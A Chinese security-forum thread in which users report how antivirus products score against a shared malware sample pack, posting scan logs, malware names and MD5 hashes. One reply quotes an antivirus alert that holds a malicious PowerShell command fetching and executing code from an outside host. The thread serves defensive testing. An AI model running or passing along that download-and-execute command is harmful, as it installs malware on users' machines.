收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 【开放测试】卡饭病毒样本包 20200714 第85期
1234下一页
返回列表 发新帖
楼主: Jirehlov1234
 收起左侧

[病毒样本] 【开放测试】卡饭病毒样本包 20200714 第85期

   关闭 [复制链接]
欧阳宣
头像被屏蔽
发表于 2020-7-14 22:52:31 | 显示全部楼层
本帖最后由 欧阳宣 于 2020-7-14 23:29 编辑

BEST win10 x64 2004监控剩余4x
DHL011738920028PDF 触发上传沙箱 鉴定为PasswordStealer
وثائق التحويل
  1. On-Access scanning has detected an execution of a malicious command line.The process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe was blocked because of the execution of a malicious command line -Command IEX (New-Object(''Net.WebClient'')).''DoWnloadsTrInG''(''http://lujo.world/parse.jpg'')
复制代码


回复

举报

anthonyqian
发表于 2020-7-14 23:11:39 | 显示全部楼层
rogersg 发表于 2020-7-14 22:33
唉,Norton这还是老样子,下载智能分析触发不了就疯狂拉垮。。。扫描连360都要不如了。。。

额 有时间双击看看
回复

举报

heishen2010
发表于 2020-7-14 23:18:13 | 显示全部楼层
测试环境:Windows 10 企业版 2004
测试产品:腾讯电脑管家 13.6.20671.242
病毒库版本:管家反病毒引擎(2020-07-14)
测试项目:扫描
测试配置:标准
结果:扫描(3/14)
日志:
截图(可选):

  1. 【扫描信息】

  3. 开始时间:2020-7-14 23:05:38
  4. 扫描用时:00:00:01
  5. 扫描类型:指定位置杀毒
  6. 扫描引擎:管家云查杀引擎 管家反病毒引擎 管家系统修复引擎 Bitdefender本地查杀引擎
  7. 扫描状态:扫描完成


  10. 【扫描结果】

  12. 扫描文件数:14
  13. 发现风险数:3
  14. 已处理风险数:3


  17. ---------------------
  18. 2020-7-14 23:06:17 MD5:e6bc38ccba3e57d16ace4b8512f3d95b C:\Users\Hai-qing_Pan\Desktop\7.14\DHL011738920028PDF.exe [Win32.Trojan.Inject.Auto]  [删除成功]
  19. 2020-7-14 23:06:17 MD5:1fc438c9c6774fa4efa4725837c4fda0 C:\Users\Hai-qing_Pan\Desktop\7.14\update130720.dll [Win32.Trojan.Zenpak.Edeq]  [删除成功]
  20. 2020-7-14 23:06:17 MD5:10fcf8f9a5cbf00587934bf6c817846b C:\Users\Hai-qing_Pan\Desktop\7.14\
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

rogersg
发表于 2020-7-14 23:33:40 | 显示全部楼层
本帖最后由 rogersg 于 2020-7-14 23:46 编辑
Lawchake78 发表于 2020-7-14 20:14
测试环境:WIN10 2004 企业版
测试产品:ESET INTERNET SECURITY 13.2.15.0
病 ...

可以发个日志看下وثائق التحويل.xls这个样本是什么报法么。。。我这边也是21653的病毒库版本,但扫描不会报,上传到VT扫描ESET也不报,有点奇怪。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

rogersg
发表于 2020-7-14 23:38:04 | 显示全部楼层
anthonyqian 发表于 2020-7-14 23:11
额 有时间双击看看

等过两天有时间我装虚拟机试试吧,因为之前不管怎么样都触发不了下载智能分析我还特意把系统重装了,结果重装以后还是触发不了,问诺顿客服,客服说了一堆什么诺顿安全防护级别很高,就算下载智能分析触发不了也不会对安全防护效果产生很大的影响啥的。。。但就毒区的测试结果来看好像并不是这样。。。
回复

举报

anthonyqian
发表于 2020-7-14 23:59:37 | 显示全部楼层
rogersg 发表于 2020-7-14 23:38
等过两天有时间我装虚拟机试试吧,因为之前不管怎么样都触发不了下载智能分析我还特意把系统重装了,结果 ...

很好触发的呀 ①浏览器用edge、②解压缩用7-zip、③文件要刚下载 这三个条件同时满足应该都可以触发的
回复

举报

LSPD
发表于 2020-7-15 00:06:58 | 显示全部楼层
rogersg 发表于 2020-7-14 23:38
等过两天有时间我装虚拟机试试吧,因为之前不管怎么样都触发不了下载智能分析我还特意把系统重装了,结果 ...

下载过程也要在虚拟机内进行
回复

举报

/yl天然卷
发表于 2020-7-15 00:12:21 | 显示全部楼层
BDTS 2019
扫描完删除后还剩八个样本。
回复

举报

FD丶纸鸢
发表于 2020-7-15 05:55:23 | 显示全部楼层
管家国际版9x
回复

举报

桑德尔
头像被屏蔽
发表于 2020-7-15 11:11:27 | 显示全部楼层
happy_king 发表于 2020-7-14 20:01
测试环境:windows10 2004 x86
测试产品:火绒安全软件
病毒库版本:2020-07-14 ...

原来两个分数相加的结果,是分子+分子、分母+分母呀
回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 03:38 , Processed in 0.101915 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表